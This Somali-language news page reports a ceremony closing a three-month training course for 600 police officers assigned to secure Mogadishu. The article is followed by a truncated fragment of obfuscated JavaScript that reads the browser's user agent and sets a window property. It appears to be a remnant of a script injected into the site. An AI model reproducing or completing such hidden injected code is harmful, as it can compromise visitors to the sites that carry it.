Saturday, March 22, 2025
HomeWararSawirro:- Ciidamo Sugaya Amniga Muqdisho Oo Tababar Loo Soo Xiray

Sawirro:- Ciidamo Sugaya Amniga Muqdisho Oo Tababar Loo Soo Xiray

Wasiirka Amniga Xukuumadda Federaalka Soomaaliya Mudane Maxamed Abuukar Ducaalle ayaa maanta dugsiga tababarka Booliska ee Gen. kaahiye tababar ugu soo xiray 600 askari oo ka tirsan Ciidanka Booliska Soomaaliyeed.

Ciidanka ayaa loogu talo galay Sugidda Ammaanka magaaladda Muqdisho, waxaana Munaasabadda tababarka loogu soo xiray ku sugnaa Guddoomiyaha Maamulka gobolkq Banaadir, Ku-simaha Taliyaha Ciidanka Booliska S/guuto Zakia Axmed, Saraakiil iyo masuuliyiin kale.

Cutubyadii Tababarka loo soo xiray ayaa soo bandhigay Gaada ka ciyaar Qurux badan iyo dhoola tus ka tarjumaya tababarka ay qaateen oo u socday muddo seddex bilood ah.

Ku-simaha Taliyaha ciidanka Booliska ahna Taliye ku-xiggeenka ciidanka S/guuto Zakia Axmed oo munaasabadda ka hadashay ayaa ciidankaasi kula dardaarantay inay noqdaan kuwa kasoo dhalaala waajibaadka Qaran ee loo igmaday.

Wasiirka Amniga XFS Mudane Maxamed Abuukar Islow ayaa u hambalyeey Ciidanka tababarka loo soo xiray, waxaana uu faray in si wanaagsan ay ula dhaqmaan Bulshadda, ayna u naxariistaan.

[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe